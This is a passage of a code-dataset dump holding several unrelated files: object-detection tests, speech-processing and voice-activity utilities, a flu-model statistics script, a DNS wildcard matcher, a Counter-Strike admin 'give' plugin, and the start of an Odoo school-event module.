inferences['boxes2D']\n assert len(predicted_boxes2D) == len(labelled_boxes)\n for box2D, predicted_box2D in zip(labelled_boxes, predicted_boxes2D):\n assert np.allclose(box2D.coordinates, predicted_box2D.coordinates)\n assert np.allclose(box2D.score, predicted_box2D.score)\n assert (box2D.class_name == predicted_box2D.class_name)\n\n\ndef test_SSD512COCO(image_with_everyday_objects, boxes_SSD512COCO):\n detector = SSD512COCO()\n assert_inferences(detector, image_with_everyday_objects, boxes_SSD512COCO)\n\n\ndef test_SSD300VOC(image_with_everyday_objects, boxes_SSD300VOC):\n detector = SSD300VOC()\n assert_inferences(detector, image_with_everyday_objects, boxes_SSD300VOC)\n\n\ndef test_SSD300FAT(image_with_tools, boxes_SSD300FAT):\n detector = SSD300FAT(0.5)\n assert_inferences(detector, image_with_tools, boxes_SSD300FAT)\n\n\ndef test_SSD512YCBVideo(image_with_tools, boxes_SSD512YCBVideo):\n detector = SSD512YCBVideo()\n assert_inferences(detector, image_with_tools, boxes_SSD512YCBVideo)\n\n\ndef test_HaarCascadeFrontalFace(image_with_faces, boxes_HaarCascadeFace):\n detector = HaarCascadeFrontalFace()\n assert_inferences(detector, image_with_faces, boxes_HaarCascadeFace)\n\n\ndef test_DetectMiniXceptionFER(image_with_faces, boxes_MiniXceptionFER):\n detector = DetectMiniXceptionFER()\n assert_inferences(detector, image_with_faces, boxes_MiniXceptionFER)\n\n\ndef test_boxes_DetectFaceKeypointNet2D32(image_with_faces,\n boxes_FaceKeypointNet2D32):\n detector = DetectFaceKeypointNet2D32()\n assert_inferences(detector, image_with_faces, boxes_FaceKeypointNet2D32)\n","sub_path":"tests/paz/pipelines/detection_test.py","file_name":"detection_test.py","file_ext":"py","file_size_in_byte":5349,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"548065420","text":"import re\n\nnum_test = int(input())\nnum_list = []\nfor i in range(num_test):\n num = int(input())\n num_list.append(num)\nfor i in range(num_test):\n num = num_list[i]\n limit = 0\n j = 2\n while True:\n if pow(2, j) - 2 >= num:\n limit = j\n break\n j = j + 1\n bitNum = limit - 1\n length = int(pow(2, bitNum))\n order = num - int(pow(2, bitNum)) + 2\n valid_list = []\n while length > 1:\n if order % length == 0 or order % length > int(length / 2):\n valid_list.append('7')\n length = int(length / 2)\n else:\n valid_list.append('4')\n length = int(length / 2)\n res = ''.join(valid_list)\n print(res)","sub_path":"Code/CodeRecords/2185/60870/278625.py","file_name":"278625.py","file_ext":"py","file_size_in_byte":712,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"309568559","text":"import torch\nimport os\nfrom model import xvecTDNN\nimport random\nimport numpy as np\nimport librosa\nimport webrtcvad\nimport sys\nimport collections\nimport contextlib\nimport wave\n\n\ndef load_data(hparams):\n f = open(hparams.train_data_txt_dir, 'r')\n mel_list = []\n language_id = []\n time = []\n while True:\n line = f.readline()\n if line != '':\n mel_list.append(line.split(' ')[0])\n language_id.append(line.split(' ')[1])\n time.append(line.split(' ')[2])\n else:\n break\n size = len(mel_list)\n index = [i for i in range(size)]\n random.shuffle(index)\n mel_list = np.array(mel_list)[index]\n language_id = np.array(language_id)[index]\n time = np.array(time)[index]\n return [mel_list[:int(size * 0.9)], language_id[:int(size * 0.9)], time[:int(size * 0.9)]],\\\n [mel_list[int(size * 0.9):], language_id[int(size * 0.9):], time[int(size * 0.9):]]\n\n\ndef load_recent_model(model_path):\n \"\"\"\n 返回最近的权重文件\n :param path:\n :return:\n \"\"\"\n model_list = os.listdir(model_path)\n recent_epoch = -1\n recent_file = None\n for model_file in model_list:\n epoch = int(((model_file.split('_')[-1]).split('-')[0])[1:])\n if epoch > recent_epoch:\n recent_epoch = epoch\n recent_file = model_file\n print('recent file', recent_file)\n if recent_file is None:\n return None\n else:\n return os.path.join(model_path, recent_file), recent_epoch\n\n\ndef load_best_model(model_path, hparams):\n \"\"\"\n 返回acc最好的权重文件\n :param path:\n :return:\n \"\"\"\n model_list = os.listdir(model_path)\n best_acc = 0\n best_file = None\n for model_file in model_list:\n model_acc = float((model_file.split('-')[-1])[:-3])\n if hparams.load_epoch is not None:\n epoch = int(((model_file.split('_')[-1]).split('-')[0])[1:])\n if epoch != hparams.load_epoch:\n continue\n if model_acc > best_acc:\n best_acc = model_acc\n best_file = model_file\n print('best_file', best_file)\n return os.path.join(model_path, best_file)\n\n\ndef create_model(hparams, mode='train'):\n if hparams.model == 'xvecTDNN':\n mymodel = xvecTDNN(hparams)\n else:\n raise ValueError('model not exist!')\n\n if mode == 'train':\n if load_recent_model(hparams.model_save_path) is not None:\n model_path, recent_epoch = load_recent_model(hparams.model_save_path)\n checkpoint = torch.load(model_path)\n if hparams.model == 'xvecTDNN':\n mymodel.load_state_dict(checkpoint['model_state'])\n return mymodel, recent_epoch\n else:\n return mymodel, 0\n else:\n best_file_path = load_best_model(hparams.model_save_path, hparams)\n checkpoint = torch.load(best_file_path)\n if hparams.model == 'xvecTDNN':\n mymodel.load_state_dict(checkpoint['model_state'])\n return mymodel\n\n\ndef get_predict_file_list(predict_path):\n if os.path.isfile(predict_path):\n return [predict_path]\n else:\n result = []\n predict_folder = os.listdir(predict_path)\n predict_folder.sort()\n for predict_file in predict_folder:\n result.append(os.path.join(predict_path, predict_file))\n return result\n\n\ndef feature_extract(wav_path, mode='mel_spectrum'):\n if mode == 'mel_spectrum':\n pass\n else:\n raise ValueError('Unlegal feature extracting method!')\n\n\ndef get_melspectrum(hparams, wav_path):\n try:\n y, sr = librosa.load(wav_path)\n except Exception:\n print('Error open', wav_path)\n return None\n else:\n mel = librosa.feature.melspectrogram(y=y, sr=sr, n_mels=hparams.n_mels,\n n_fft=hparams.mel_frame_length,\n hop_length=hparams.mel_frame_shift)\n logmel = librosa.power_to_db(mel ** 2)\n # 这里可以看一下时长,如果平均时长比较长 可以采用这种方法 否则最好全局normalize\n return 
librosa.util.normalize(logmel, axis=1)\n\n\nclass Frame(object):\n \"\"\"Represents a \"frame\" of audio data.\"\"\"\n def __init__(self, bytes, timestamp, duration):\n self.bytes = bytes\n self.timestamp = timestamp\n self.duration = duration\n\n\nclass VadSplit:\n def __init__(self, hparams, wav_path, output_path):\n self.vad_mode = hparams.vad_mode\n self.frame_length = hparams.vad_frame_dur\n self.buffer_length = hparams.vad_buffer_length\n self.wav_path = wav_path\n self.output_path = output_path\n self.audio, self.sample_rate = self.read_wave()\n\n def read_wave(self):\n try:\n with contextlib.closing(wave.open(self.wav_path, 'rb')) as wf:\n num_channels = wf.getnchannels()\n assert num_channels == 1\n sample_width = wf.getsampwidth()\n assert sample_width == 2\n sample_rate = wf.getframerate()\n assert sample_rate in (8000, 16000, 32000, 48000)\n pcm_data = wf.readframes(wf.getnframes())\n return pcm_data, sample_rate\n except Exception:\n print('Error open', self.wav_path)\n return None, None\n\n def write_wave(self, path, audio):\n with contextlib.closing(wave.open(path, 'wb')) as wf:\n wf.setnchannels(1)\n wf.setsampwidth(2)\n wf.setframerate(self.sample_rate)\n wf.writeframes(audio)\n\n def frame_generator(self):\n \"\"\"Generates audio frames from PCM audio data.\n Takes the desired frame duration in milliseconds, the PCM data, and\n the sample rate.\n Yields Frames of the requested duration.\n \"\"\"\n # 因为wave库是以byte方式读入数据,而给定音频是每个数据是16-bit,也就是一个数据就要占2byte\n # 因此需要乘2来获取对应时长的数据\n n = int(self.sample_rate * (self.frame_length / 1000.0) * 2)\n offset = 0\n timestamp = 0.0\n duration = (float(n) / self.sample_rate) / 2.0\n while offset + n < len(self.audio):\n yield Frame(self.audio[offset:offset + n], timestamp, duration)\n timestamp += duration\n offset += n\n\n def vad_collector(self, vad, frames):\n num_padding_frames = self.buffer_length\n ring_buffer = collections.deque(maxlen=num_padding_frames)\n triggered = False\n\n voiced_frames = []\n for frame in frames:\n is_speech = vad.is_speech(frame.bytes, self.sample_rate)\n\n # sys.stdout.write('1' if is_speech else '0')\n if not triggered:\n ring_buffer.append((frame, is_speech))\n num_voiced = len([f for f, speech in ring_buffer if speech])\n # If we're NOTTRIGGERED and more than 90% of the frames in\n # the ring buffer are voiced frames, then enter the\n # TRIGGERED state.\n if num_voiced > 0.9 * ring_buffer.maxlen:\n triggered = True\n # sys.stdout.write('+(%s)' % (ring_buffer[0][0].timestamp,))\n # We want to yield all the audio we see from now until\n # we are NOTTRIGGERED, but we have to start with the\n # audio that's already in the ring buffer.\n for f, s in ring_buffer:\n voiced_frames.append(f)\n ring_buffer.clear()\n else:\n # We're in the TRIGGERED state, so collect the audio data\n # and add it to the ring buffer.\n voiced_frames.append(frame)\n ring_buffer.append((frame, is_speech))\n num_unvoiced = len([f for f, speech in ring_buffer if not speech])\n # If more than 90% of the frames in the ring buffer are\n # unvoiced, then enter NOTTRIGGERED and yield whatever\n # audio we've collected.\n if num_unvoiced > 0.9 * ring_buffer.maxlen:\n # sys.stdout.write('-(%s)' % (frame.timestamp + frame.duration))\n triggered = False\n yield b''.join([f.bytes for f in voiced_frames])\n ring_buffer.clear()\n voiced_frames = []\n # if triggered:\n # sys.stdout.write('-(%s)' % (frame.timestamp + frame.duration))\n # sys.stdout.write('\\n')\n # If we have any leftover voiced audio when we run out of input,\n # yield it.\n if 
voiced_frames:\n yield b''.join([f.bytes for f in voiced_frames])\n\n def output_segment(self):\n if self.audio is None:\n return\n vad = webrtcvad.Vad(self.vad_mode)\n frames = self.frame_generator()\n frames = list(frames)\n segments = self.vad_collector(vad, frames)\n wav_name = os.path.basename(self.wav_path).split('.')[0]\n output_base_name = os.path.join(self.output_path, wav_name)\n for i, segment in enumerate(segments):\n path = output_base_name + '-%d.wav' % (i,)\n self.write_wave(path, segment)\n","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":9297,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"5061016","text":"# -*- coding: utf-8 -*-\n\n\"\"\"Script which can be used to compare the features obtained of two different influenza models\n\nUsage:\n get_model_statistics.py [--country=] [--no-future] [--basedir=] [--start-year=] [--end-year=] [--save] [--no-graph]\n\n Data file of the first model\n Data file of the second model\n -h, --help Print this help message\n\"\"\"\n\nimport pandas as pd\nimport numpy as np\nfrom scipy import stats\nfrom docopt import docopt\nimport os\nimport glob\n\nfrom sklearn.metrics import mean_squared_error\n\nimport seaborn as sns\nimport matplotlib.pyplot as plt\nsns.set()\n\ndef get_results_filename(basepath):\n files = [f for f in glob.glob(basepath + \"/*-prediction.csv\", recursive=True)]\n y = os.path.basename(files[0]).split(\"-\")[0]\n y2 = os.path.basename(files[0]).split(\"-\")[1]\n return \"{}-{}\".format(y, y2)\n\nif __name__ == \"__main__\":\n\n args = docopt(__doc__)\n\n model = args[\"\"]\n base_dir = args[\"--basedir\"] if args[\"--basedir\"] else \"../complete_results\"\n country = args[\"--country\"] if args[\"--country\"] else \"italy\"\n future = \"no-future\" if args[\"--no-future\"] else \"future\"\n\n # Read the baseline results and merge them\n model_path = os.path.join(base_dir, args[\"\"], future, country)\n season_years = get_results_filename(model_path)\n model_file = os.path.join(model_path, \"{}-prediction.csv\".format(season_years))\n\n # Load the data\n data = pd.read_csv(model_file)\n\n # Get only the weeks we care for\n start_year = \"2007-42\" if not args[\"--start-year\"] else args[\"--start-year\"]\n end_year = \"2019-15\" if not args[\"--end-year\"] else args[\"--end-year\"]\n\n start_season = data[\"week\"] >= start_year\n end_season = data[\"week\"] <= str(int(end_year.split(\"-\")[0]) + 1) + \"-\" + end_year.split(\"-\")[1]\n total = start_season & end_season\n\n data = data[total]\n\n # Describe the data\n print(\"\")\n print(\"[*] Describe the given dataset {}\".format(model_file))\n print(data.describe())\n\n # Generate residuals\n print(\"\")\n print(\"[*] Describe the residuals\")\n residuals = data[\"incidence\"]-data[\"prediction\"]\n print(residuals.describe())\n\n # Get some statistics\n print(\"\")\n total_pearson = 0\n for i in np.arange(0, len(data[\"prediction\"]), 26):\n total_pearson += stats.pearsonr(data[\"prediction\"][i:i+26], data[\"incidence\"][i:i+26])[0]\n print(\"Pearson Correlation (value/p): \", total_pearson/(len(data[\"prediction\"])/26))\n print(\"\")\n\n print(\"Mean Squared Error: \", mean_squared_error(data[\"prediction\"], data[\"incidence\"]))\n print(\"\")\n\n if not args[\"--no-graph\"]:\n ax = sns.distplot(residuals, label=\"Residual\")\n plt.figure()\n ax = sns.distplot(data[\"incidence\"], label=\"Incidence\")\n ax = sns.distplot(data[\"prediction\"], label=\"Prediction\")\n plt.legend()\n plt.show()\n","sub_path":"data_analysis/get_model_statistics.py","file_name":"get_model_statistics.py","file_ext":"py","file_size_in_byte":2940,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"194282833","text":"#!/usr/bin/env python3\n\nrr1 = \"*.bbb.cc.d\"\nrr2 = \"aaaa.bbb.cc\"\nrr3 = \"*cc.d\"\nhmap = {rr1 : rr1, rr2 : rr2, rr3 : rr3 }\nr = \"q.w.e.r.t.y.bbb.cc.d\"\n\ndef wild_card_match(hash_map, rec):\n \n if (rec in hash_map):\n print(\"Found match!\")\n return \n\n sub_domains = rec.split(\".\")\n # For each subdomain in RR -> O(n), n = subdomain levels\n for i in sub_domains:\n s = \".\".join(sub_domains[1:])\n print(\"*\"+s)\n sub_domains = s.split(\".\") \n\n # Python dict is a hash map, hash map search is O(1)\n if \"*\"+s in hash_map or s in hash_map:\n print(\"Found match!\")\n return\n\n sub_domains = rec.split(\".\")\n # Do the same but from the tail. -> O(2*n)\n for i in sub_domains:\n s = \".\".join(sub_domains[:-1])\n print(s+\"*\")\n sub_domains = s.split(\".\") \n \n # Python dict is a hash map, hash map search is O(1)\n if s+\"*\" in hash_map:\n print(\"Found match!\")\n return\n \n print(\"No match for the input record.\")\n\n\nwild_card_match(hmap, r)\n","sub_path":"wildcard_match.py","file_name":"wildcard_match.py","file_ext":"py","file_size_in_byte":1070,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"562868170","text":"import es\nimport gamethread\nimport popuplib\nimport playerlib\n\nfrom xa import xa\n\nimport psyco\npsyco.full()\n\ninfo = es.AddonInfo()\ninfo.name = 'Admin Give'\ninfo.version = '1.0.4'\ninfo.basename = 'xaadmingive'\n\nxaadmingive \t\t\t = xa.register('xaadmingive')\nxalanguage \t\t\t = xaadmingive.language.getLanguage()\nadmingive_anonymous = xaadmingive.setting.createVariable('admingive_anonymous' , 0, 'Whether or not giving a player a weapon is anonymous... 1 = Anonymous, 0 = Global')\nadmingive_stripfirst = xaadmingive.setting.createVariable(\"admingive_stripfirst\", 1, 'Whether or not the target is striped of their weapon before being gave another.\\n // Will only strip the same slot as their being given.')\n\npistols = ('usp','glock','p228','deagle','elite','fiveseven')\nshotguns = ('m3','xm1014')\nsmgs = ('tmp','mac10','mp5navy','ump45','p90')\nrifles = ('famas','galil','ak47','m4a1','sg552','aug')\nsnipers = ('scout','sg550','g3sg1','awp')\ngrenades = ('hegrenade','smokegrenade','flashbang')\nitems = ('vest','vesthelm','nvgs','c4','defuser')\nadmins = {}\ngamename = str(es.ServerVar('eventscripts_gamedir')).replace('\\\\', '/').split('/')[~0]\n\n####################\n# EVENTS\ndef player_disconnect(ev):\n if admins.has_key(int(ev['userid'])):\n del admins[int(ev['userid'])]\n####################\n\ndef load():\n admingivemenu = popuplib.easymenu(\"admingive\", \"_tempcore\", _select_give)\n admingivemenu.settitle(xalanguage[\"give object\"])\n xaadmingive.addMenu(\"admingive\", xalanguage[\"give\"], \"admingive\", \"give\", \"ADMIN\")\n admingivemenu.addoption(1, xalanguage[\"give weapon\"])\n admingivemenu.addoption(2, xalanguage[\"give item\"])\n admingivemenu.addoption(3, xalanguage[\"give health\"])\n if gamename == 'cstrike': \n admingivemenu.addoption(4, xalanguage[\"give cash\"])\n \n giveweapon = popuplib.easymenu(\"admingiveweapon\", '_tempcore', _select_weapon_type)\n giveweapon.settitle(xalanguage[\"select weapon type\"])\n giveweapon.addoption(1, xalanguage[\"pistols\"])\n giveweapon.addoption(2, xalanguage[\"shotguns\"])\n giveweapon.addoption(3, xalanguage[\"smgs\"])\n giveweapon.addoption(4, xalanguage[\"rifles\"])\n giveweapon.addoption(5, xalanguage[\"snipers\"])\n giveweapon.addoption(6, xalanguage[\"machinegun\"])\n giveweapon.addoption(7, xalanguage[\"grenades\"])\n giveweapon.submenu(10, \"admingive\")\n \n pistolsmenu = popuplib.easymenu(\"admingivepistols\", '_tempcore', _give)\n for weapon in pistols:\n pistolsmenu.addoption('weapon_' + weapon, xalanguage[weapon])\n pistolsmenu.submenu(10, \"admingiveweapon\")\n pistolsmenu.settitle(xalanguage[\"pistols\"])\n \n shotgunsmenu = popuplib.easymenu(\"admingiveshotguns\", '_tempcore', _give)\n for weapon in shotguns:\n shotgunsmenu.addoption('weapon_' + weapon, xalanguage[weapon])\n shotgunsmenu.submenu(10, \"admingiveweapon\")\n shotgunsmenu.settitle(xalanguage[\"shotguns\"])\n \n smgsmenu = popuplib.easymenu(\"admingivesmgs\", '_tempcore', _give)\n for weapon in smgs:\n smgsmenu.addoption('weapon_' + weapon, xalanguage[weapon])\n smgsmenu.submenu(10, \"admingiveweapon\")\n smgsmenu.settitle(xalanguage[\"smgs\"])\n \n riflesmenu = popuplib.easymenu(\"admingiverifles\", '_tempcore', _give)\n for weapon in rifles:\n riflesmenu.addoption('weapon_' + weapon, xalanguage[weapon])\n riflesmenu.submenu(10, \"admingiveweapon\")\n riflesmenu.settitle(xalanguage[\"rifles\"])\n \n snipersmenu = popuplib.easymenu(\"admingivesnipers\", '_tempcore', _give)\n for weapon in snipers:\n 
snipersmenu.addoption('weapon_' + weapon, xalanguage[weapon])\n snipersmenu.submenu(10, \"admingiveweapon\")\n snipersmenu.settitle(xalanguage[\"snipers\"])\n \n machine = popuplib.easymenu(\"admingivemachinegun\", '_tempcore', _give)\n machine.addoption('weapon_m249', xalanguage['m249'])\n machine.submenu(10, \"admingiveweapon\")\n machine.settitle(xalanguage[\"machinegun\"])\n \n greandesmenu = popuplib.easymenu(\"admingivegrenades\", '_tempcore', _give)\n for weapon in grenades:\n greandesmenu.addoption('weapon_' + weapon, xalanguage[weapon])\n greandesmenu.submenu(10, \"admingiveweapon\")\n greandesmenu.settitle(xalanguage[\"grenades\"])\n \n giveitem = popuplib.easymenu(\"admingiveitem\", '_tempcore', _give)\n for item in items:\n if item == 'c4':\n giveitem.addoption('weapon_' + item, xalanguage[item])\n else:\n if 'vest' in item and gamename == 'cstrike':\n giveitem.addoption('item_' + item, xalanguage[item])\n elif 'vest' not in item:\n giveitem.addoption('item_' + item, xalanguage[item])\n giveitem.submenu(10, \"admingive\")\n giveitem.settitle(xalanguage[\"select item\"])\n \n targetmenu = popuplib.easymenu(\"targetmenu\", \"_tempcore\", _select_target)\n targetmenu.settitle(xalanguage[\"choose target\"])\n targetmenu.addoption(\"player\", xalanguage[\"select a player\"])\n targetmenu.addoption(\"bots\", xalanguage[\"bots\"])\n targetmenu.addoption(\"team3\", xalanguage[\"counter terrorists\"])\n targetmenu.addoption(\"team2\", xalanguage[\"terrorists\"])\n targetmenu.addoption(\"all\", xalanguage[\"all players\"])\n \n cash = popuplib.easymenu(\"admingivecash\", \"_tempcore\", _select_cash_amount)\n for b in ('10','100','500','1000','2000','4000','8000','16000'):\n d = b\n c = ''\n while len(b) > 3:\n c = ',' + b[-3:]\n b = b[0:-3]\n c = '$' + b + c\n cash.addoption(int(d), c)\n cash.settitle(xalanguage[\"give cash\"])\n cash.submenu(10, 'admingive')\n \n health = popuplib.easymenu(\"admingivehealth\", \"_tempcore\", _select_health_amount)\n for b in ('1','5','10','50','100','1000','10000','100000'):\n d = b\n c = ''\n while len(b) > 3:\n c = ',' + b[-3:]\n b = b[0:-3]\n c = b + c\n health.addoption(int(d), c)\n health.settitle(xalanguage[\"give health\"])\n health.submenu(10, 'admingive')\n \ndef unload():\n for popup in ['pistols','shotguns','smgs','rifles','snipers','machinegun','grenades','item','health','cash','']:\n if popuplib.exists('admingive' + popup):\n popuplib.close('admingive' + popup, es.getUseridList())\n popuplib.delete('admingive' + popup)\n for popup in ['targetmenu','giveplayermenu']:\n if popuplib.exists(popup):\n popuplib.close(popup, es.getUseridList())\n popuplib.delete(popup)\n xaadmingive.unregister()\n \ndef _select_target(userid, choice, popupid):\n if not admins.has_key(userid):\n return\n if choice == \"player\":\n giveplayermenu = popuplib.construct(\"giveplayermenu\", \"players\", \"#alive\")\n giveplayermenu.settitle(xalanguage[\"choose player\"])\n giveplayermenu.menuselectfb = _select_player\n giveplayermenu.send(userid)\n else:\n if choice == \"team3\":\n playerlist = filter(lambda x: es.getplayerteam(x) == 3, es.getUseridList())\n elif choice == \"team2\":\n playerlist = filter(lambda x: es.getplayerteam(x) == 2, es.getUseridList())\n elif choice == \"bots\":\n playerlist = filter(lambda x: es.isbot(x), es.getUseridList())\n elif choice == \"all\":\n playerlist = es.getUseridList()\n playerlist = filter(lambda x: not es.getplayerprop(x, 'CBasePlayer.pl.deadflag'), playerlist)\n for player in playerlist:\n command = admins[userid]['command']\n 
if command.startswith('weapon_') or command.startswith('item_'):\n if str(admingive_anonymous) == '0':\n tokens = {}\n tokens['admin'] = es.getplayername(userid)\n tokens['user'] = es.getplayername(player)\n for myplayer in playerlib.getPlayerList('#human'):\n tokens['item'] = '#greena #lightgreen' + str(xalanguage(command.replace('weapon_','').replace('item_',''), lang=myplayer.get(\"lang\")))\n es.tell(int(myplayer), '#multi', xalanguage('admin give', tokens, myplayer.get(\"lang\")))\n if 'vest' not in command:\n if str(admingive_stripfirst) == '1':\n if command.replace('weapon_','') in pistols:\n secondary = playerlib.getPlayer(player).get('secondary') \n if secondary:\n RemoveWeapon(player, secondary)\n elif command.replace('weapon_','') in (list(shotguns) + list(smgs) + list(rifles) + list(snipers) + ['m249']):\n primary = playerlib.getPlayer(player).get('primary') \n if primary:\n RemoveWeapon(player, primary)\n gamethread.delayed(0.1, es.server.queuecmd, 'es_xgive %s %s'%(player, command))\n else:\n if 'helm' in command:\n es.setplayerprop(player, 'CCSPlayer.m_bHasHelmet', 1)\n es.setplayerprop(player, 'CCSPlayer.m_ArmorValue', 100)\n elif command.startswith('health_'):\n if str(admingive_anonymous) == '0':\n tokens = {}\n tokens['admin'] = es.getplayername(userid)\n tokens['user'] = es.getplayername(player)\n health = command.replace('health_','')\n c = ''\n while len(health) > 3:\n c = ',' + health[-3:]\n health = health[0:-3]\n c = health + c\n tokens['item'] = '#green' + c + ' #lightgreenhealth'\n for myplayer in playerlib.getPlayerList('#human'):\n es.tell(int(myplayer), '#multi', xalanguage('admin give', tokens, myplayer.get(\"lang\")))\n es.setplayerprop(player, 'CBasePlayer.m_iHealth', es.getplayerprop(player, 'CBasePlayer.m_iHealth') + int(command.replace('health_','')))\n elif command.startswith('cash_'):\n if str(admingive_anonymous) == '0':\n tokens = {}\n tokens['admin'] = es.getplayername(userid)\n tokens['user'] = es.getplayername(player)\n cash = command.replace('cash_','')\n c = ''\n while len(cash) > 3:\n c = ',' + cash[-3:]\n cash = cash[0:-3]\n c = '$' + cash + c\n tokens['item'] = '#green' + c\n for myplayer in playerlib.getPlayerList('#human'):\n es.tell(int(myplayer), '#multi', xalanguage('admin give', tokens, myplayer.get(\"lang\")))\n es.setplayerprop(player, 'CCSPlayer.m_iAccount', es.getplayerprop(player, 'CCSPlayer.m_iAccount') + int(command.replace('cash_','')))\n\ndef _select_player(userid, choice, popupid):\n command = admins[userid]['command']\n if command.startswith('weapon_') or command.startswith('item_'):\n if 'vest' not in command:\n if str(admingive_stripfirst) == '1':\n if command.replace('weapon_','') in pistols:\n secondary = playerlib.getPlayer(choice).get('secondary') \n if secondary:\n RemoveWeapon(choice, secondary)\n elif command.replace('weapon_','') in (list(shotguns) + list(smgs) + list(rifles) + list(snipers) + ['m249']):\n primary = playerlib.getPlayer(choice).get('primary') \n if primary:\n RemoveWeapon(choice, primary)\n gamethread.delayed(0.1, es.server.queuecmd, 'es_xgive %s %s'%(choice, command))\n else:\n if 'helm' in command:\n es.setplayerprop(choice, 'CCSPlayer.m_bHasHelmet', 1)\n es.setplayerprop(choice, 'CCSPlayer.m_ArmorValue', 100)\n if str(admingive_anonymous) == '0':\n tokens = {}\n tokens['admin'] = es.getplayername(userid)\n tokens['user'] = es.getplayername(choice)\n for myplayer in playerlib.getPlayerList('#human'):\n tokens['item'] = '#greena #lightgreen' + 
str(xalanguage(command.replace('weapon_','').replace('item_',''), lang=myplayer.get(\"lang\")))\n es.tell(int(myplayer), '#multi', xalanguage('admin give', tokens, myplayer.get(\"lang\")))\n elif command.startswith('health_'):\n if str(admingive_anonymous) == '0':\n tokens = {}\n tokens['admin'] = es.getplayername(userid)\n tokens['user'] = es.getplayername(choice)\n health = command.replace('health_','')\n c = ''\n while len(health) > 3:\n c = ',' + health[-3:]\n health = health[0:-3]\n c = health + c\n tokens['item'] = '#green' + c + ' #lightgreenhealth'\n for myplayer in playerlib.getPlayerList('#human'):\n es.tell(int(myplayer), '#multi', xalanguage('admin give', tokens, myplayer.get(\"lang\")))\n es.setplayerprop(choice, 'CBasePlayer.m_iHealth', es.getplayerprop(choice, 'CBasePlayer.m_iHealth') + int(command.replace('health_','')))\n elif command.startswith('cash_'):\n if str(admingive_anonymous) == '0':\n tokens = {}\n tokens['admin'] = es.getplayername(userid)\n tokens['user'] = es.getplayername(choice)\n cash = command.replace('cash_','')\n c = ''\n while len(cash) > 3:\n c = ',' + cash[-3:]\n cash = cash[0:-3]\n c = '$' + cash + c\n tokens['item'] = '#green' + c\n for myplayer in playerlib.getPlayerList('#human'):\n es.tell(int(myplayer), '#multi', xalanguage('admin give', tokens, myplayer.get(\"lang\")))\n es.setplayerprop(choice, 'CCSPlayer.m_iAccount', es.getplayerprop(choice, 'CCSPlayer.m_iAccount') + int(command.replace('cash_','')))\n \ndef _select_cash_amount(userid, choice, popupid):\n if not admins.has_key(userid):\n admins[userid] = {}\n admins[userid]['command'] = 'cash_%s'%choice\n popuplib.send('targetmenu', userid)\n \ndef _select_health_amount(userid, choice, popupid):\n if not admins.has_key(userid):\n admins[userid] = {}\n admins[userid]['command'] = 'health_%s'%choice\n popuplib.send('targetmenu', userid)\n \ndef _select_give(userid, choice, popupid):\n if choice == 1:\n popuplib.send('admingiveweapon', userid)\n elif choice == 2:\n popuplib.send('admingiveitem', userid)\n elif choice == 3:\n popuplib.send('admingivehealth', userid)\n elif choice == 4:\n popuplib.send('admingivecash', userid)\n \ndef _select_weapon_type(userid, choice, popupid):\n if choice == 1:\n popuplib.send(\"admingivepistols\", userid)\n elif choice == 2:\n popuplib.send(\"admingiveshotguns\", userid)\n elif choice == 3:\n popuplib.send(\"admingivesmgs\", userid)\n elif choice == 4:\n popuplib.send(\"admingiverifles\", userid)\n elif choice == 5:\n popuplib.send(\"admingivesnipers\", userid)\n elif choice == 6:\n popuplib.send(\"admingivemachinegun\", userid)\n elif choice == 7:\n popuplib.send(\"admingivegrenades\", userid)\n \ndef _give(userid, choice, popupid):\n if not admins.has_key(userid):\n admins[userid] = {}\n admins[userid]['command'] = choice\n popuplib.send('targetmenu', userid)\n\ndef RemoveWeapon(userid, weapon):\n handle = es.getplayerhandle(userid)\n if not weapon.startswith('weapon_'):\n weapon = \"weapon_\" + weapon\n for index in es.createentitylist(weapon):\n if es.getindexprop(index, 'CBaseEntity.m_hOwnerEntity') == handle:\n es.server.cmd('es_xremove %s' % index)\n break","sub_path":"mattie_eventscripts/cssource_legacy/mattie_eventscripts_200beta2_250i/addons/eventscripts/xa/modules/xaadmingive/xaadmingive.py","file_name":"xaadmingive.py","file_ext":"py","file_size_in_byte":15840,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
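The cash and health menus in the record above build thousands-separated labels with a hand-rolled slicing loop. A minimal sketch, not part of the plugin and assuming a Python where the ',' format specifier exists (2.7/3.1+), of the built-in equivalent:

for amount in (10, 100, 500, 1000, 2000, 4000, 8000, 16000):
    label = '$' + format(amount, ',')  # e.g. 16000 -> '$16,000'
    print(amount, label)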
+{"seq_id":"291418822","text":"# -*- coding: utf-8 -*-\n# See LICENSE file for full copyright and licensing details.\n\nimport time\nfrom odoo import models, fields, api, _\nfrom odoo.exceptions import Warning as UserError\n\n\nclass BoardBoard(models.AbstractModel):\n _inherit = \"board.board\"\n\n\nclass SchoolStandard(models.Model):\n _name = 'school.standard'\n _inherit = 'school.standard'\n _rec_name = 'event_ids'\n\n event_ids = fields.Many2many('school.event', 'school_standard_event_rel',\n 'event_id', 'standard_id', 'Events',\n readonly=True)\n\n\nclass SchoolEventParameter(models.Model):\n '''for event parameter based on which score will given'''\n _name = 'school.event.parameter'\n _description = 'Event Parameter'\n\n name = fields.Char('Parameter Name', required=True)\n\n\nclass SchoolEventParticipant(models.Model):\n '''for Participant which are participated in events'''\n _name = 'school.event.participant'\n _description = 'Participant Information'\n _order = \"sequence\"\n\n name = fields.Many2one('student.student', 'Participant Name',\n readonly=True)\n score = fields.Float('Score', default=0)\n event_id = fields.Many2one('school.event', 'Event', readonly=True)\n stu_pid = fields.Char('Personal Identification Number', required=True,\n readonly=True)\n win_parameter_id = fields.Many2one('school.event.parameter', 'Parameter',\n readonly=True)\n sequence = fields.Integer('Rank', help=\"The sequence field is used to Give\\\n Rank to the Participant\", default=0)\n\n\nclass SchoolEvent(models.Model):\n '''for events'''\n _name = 'school.event'\n _description = 'Event Information'\n _rec_name = 'name'\n\n @api.multi\n @api.depends('part_ids')\n def _compute_participants(self):\n for rec in self:\n rec.participants = len(rec.part_ids)\n\n name = fields.Char('Event Name', help=\"Full Name of the event\")\n event_type = 